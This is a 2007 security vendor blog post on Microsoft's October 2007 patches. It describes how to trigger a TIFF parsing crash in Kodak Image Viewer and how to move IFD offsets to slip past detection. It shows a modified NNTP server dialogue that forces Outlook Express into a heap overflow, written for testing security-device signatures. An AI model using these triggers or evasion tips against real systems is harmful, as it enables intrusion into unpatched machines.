You are here: Home Community BreakingPoint Labs Blog October 2007 Microsoft Tuesday

October 2007 Microsoft Tuesday

Every Microsoft Tuesday is busy here at BreakingPoint Systems, with the entire Strike Team pouring over patches, looking at IDA disassemblies, pondering BinDiff graphs, and writing exploits. From early Tuesday morning we (and our scripts) are monitoring the Windows update site in order to get the patches and bug descriptions as soon as they become available. After that, a quick game of who's-got-what-bug, and we're off to the races.

The October 2007 Microsoft patches cover the following issues:

MS07-055
Vulnerability in Kodak Image Viewer Could Allow Remote Code Execution
References: CVE-2007-2217

The MS07-055 bulletin addresses an issue with Kodak Image Viewer in the mishandling of TIFF images. TIFF files begin with an 8 byte header which consists of byte-order indicator (bytes 0-1), the value 42 (bytes 2-3), and an offset in bytes of the first Image File Directory (IFD), which allows the IFD to be located anywhere in the file. An IFD consists of a count of the number of directory entries (2 bytes) followed by a sequence of 12-byte entries, followed by a 4-byte offset of the next IFD (or 0 if none). A valid TIFF file must contain at least one IFD.

The bug lies in the application's processing of a particular IFD entry, the BitsPerSample structure. The BitsPerSample structure consists of a 2-byte tag (258), a 2-byte type (3), a 4-byte count of values, and a 4-byte offset of where the values are located. To trigger the bug, set the offset to some arbitrary data, and as the file parser attempts to parse the values from the incorrect location, the application will crash. This crash is currently being investigated further by the BreakingPoint Strike Team in order to determine where the application crashes, and to develop a proof-of-concept exploit for the bug.

Here is an example TIFF file: Here is the crash caught in windbg:
There are three important variations to consider with exploitation of this bug. First is the byte-ordering indicator in the TIFF header. Since TIFF files can come in both byte orders, it is important to test your inline security device's coverage for this bug using both big- and little-endian TIFF files containing the attack. Second is the IFD offset field. Modifying the IFD offset in the TIFF file can aid in evading detection by devices that expect the IFD to be located near the beginning of the TIFF file. Multiple IFD entries can also be chained by using the offset to the next IFD, which requires the inline security device to parse down the entire chain of IFD entries. And finally, with file format bugs such as this, an attacker can use multiple network protocols for getting the malicious file into a victim's network. BreakingPoint includes tests covering HTTP, SMTP, POP3, and IMAP4 for most file format bugs in our strikeset.

The BreakingPoint Strike Team performed independent testing of one inline security device after applying the vendor's security pack that included coverage for this bug, and found an interesting result. It appears that the signature for this bug lacks sufficient coverage for all the cases given above. We found that this particular inline security device only provides coverage for MS07-055 when all of the following conditions are met:
  1. The transport is HTTP
  2. The TIFF file is encoded using little-endian byte ordering
  3. The IFD structure is located within the first 310 bytes of the file
Here is a graph showing the detection rate of this inline security device for the 8 strikes covering this particular bug:


What these results indicate is that 8 strikes were sent through the device, and 0 were detected. This indicates insufficient coverage for this vulnerability by this particular device.

Multiple strikes covering various transports and formats for this bug will be included in the StrikePack released on October 11, 2007

MS07-056
Security Update for Outlook Express and Windows Mail
References: CVE-2007-3897

The MS07-056 bulletin addresses an issue with the mishandling of NNTP server responses to the XHDR command. To exploit this bug, an attacker needs to cause the victim to browse an NNTP server under his control. The best way to do this is to employ HTTP redirection (either by sending an HTTP 301 header, or by meta-refreshing in the HTML, or similar), because this will require no user interaction beyond visiting the attacker-controlled page. The URL will look something like news://news.breakingpointsystems.com/alt.news.breakingpoint.

When Outlook Express interacts with a real NNTP server, the conversation between the client and server typically goes something like this like this: 
		< Client Initiates Connection >
		Server: 200 NNTP Service 5.00.0984 Version: 5.0.2195.6702 Posting Allowed
		Client: MODE READER
		Server: 200 NNTP Service 5.00.0984 Version: 5.0.2195.6702 Posting Allowed
		Client: GROUP alt.news.breakingpoint
		Server: 211 1 1003 1265 alt.news.breakingpoint
		Client: XOVER 1003-1265
		Server: 224 Overview Information Follows
		Server: < Overview of group articles >
		< Client makes requests based on user input >
In order to trigger this bug, we must get the client to issue the XHDR command. XHDR is similar to XOVER, except the client requests information about a specific header for a range of articles. A series of XHDR commands will request information about individual headers, including the From, Subject, Date, Message-ID, References, and Xrefs headers of all the articles in the group. So, how can we force Outlook Express to send the XHDR command to the server? The key is to send an error response to the XOVER command, causing the client to fall back to using XHDR.

The conversation between the client and our modified server goes like this: 
		< Client Initiates Connection >
		Server: 200 NNTP Service 5.00.0984 Version: 5.0.2195.6702 Posting Allowed
		Client: MODE READER
		Server: 200 NNTP Service 5.00.0984 Version: 5.0.2195.6702 Posting Allowed
		Client: GROUP alt.news.breakingpoint
		Server: 211 1 1003 1265 alt.news.breakingpoint
		Client: XOVER 1003-1265
		Server: 500 Error
		Client: XHDR subject 1003-1265
		Server: < Overflow of article subject headers >
		< Client crashes >
In response to the first XHDR command, an attacker should return more article headers than the client expects. The client expects to receive the number of articles the server told him about. After receiving the server reply, Outlook Express crashes, with what looks like heap corruption.



Coverage for this bug will be included in the StrikePack released on October 11, 2007

MS07-057
Cumulative Security Update for Internet Explorer
References: CVE-2007-3893, CVE-2007-3892, CVE-2007-1091, CVE-2007-3826

The MS07-057 bulletin addresses four vulnerabilities across multiple versions of Internet Explorer. Three of these vulnerabilities are related to address bar spoofing, through the use of the onUnload() and onBeforeUnload() javascript methods. These spoofing issues can be annoying, but present a low level of risk. A demonstration of one these flaws can be found on Michal Zalewski's IETrap3 page. The fourth issue is rated critical by Microsoft and allows arbitrary code execution. The Secunia advisory states the bug occurs when multiple file downloads queue at the same time. The BreakingPoint Strike Team is still working on this flaw and hope to reproduce it in time for the upcoming StrikePack.

MS07-058
Vulnerability in RPC Could Allow Denial of Service

The MS07-058 bulletin addresses a denial of service flaw in the RPCSS service. The Microsoft RPC Service (RPCSS) is vulnerable to a denial of service attack triggered during authentication. This can be caused by including invalid NTLMSSP inside of the DCERPC traffic. The result is a crash inside of rpcrt4.dll which terminates the RPCSS service and ultimately results in the reboot of the entire system. The BreakingPoint Strike Team is currently working on providing coverage for this vulnerability.

MS07-059
Vulnerability in Windows SharePoint Services Could Result in Elevation of Privilege

The MS07-059 bulletin addresses a cross-site scripting (XSS) vulnerability in the SharePoint service. This vulnerability can be used to hijack the session of another SharePoint user, if the attacker can convince the victim to access a specific URL after authenticating with the SharePoint server. We have reproduced this in-house and plan on including coverage for this flaw in the upcoming StrikePack.

MS07-060
Vulnerability in Microsoft Word Could Allow Remote Code Execution

The MS07-060 bulletin addresses a memory corruption vulnerability in Microsoft Word 2002. At this time, we have not been able to reproduce this flaw or locate an example exploit. As far as we can tell, most security vendors are using the same sample file to develop their signatures, and are not looking for the actual vulnerability.

Posted by Todd Manning (2007-10-10 14:22:05)
0 comments | Tags: microsoft //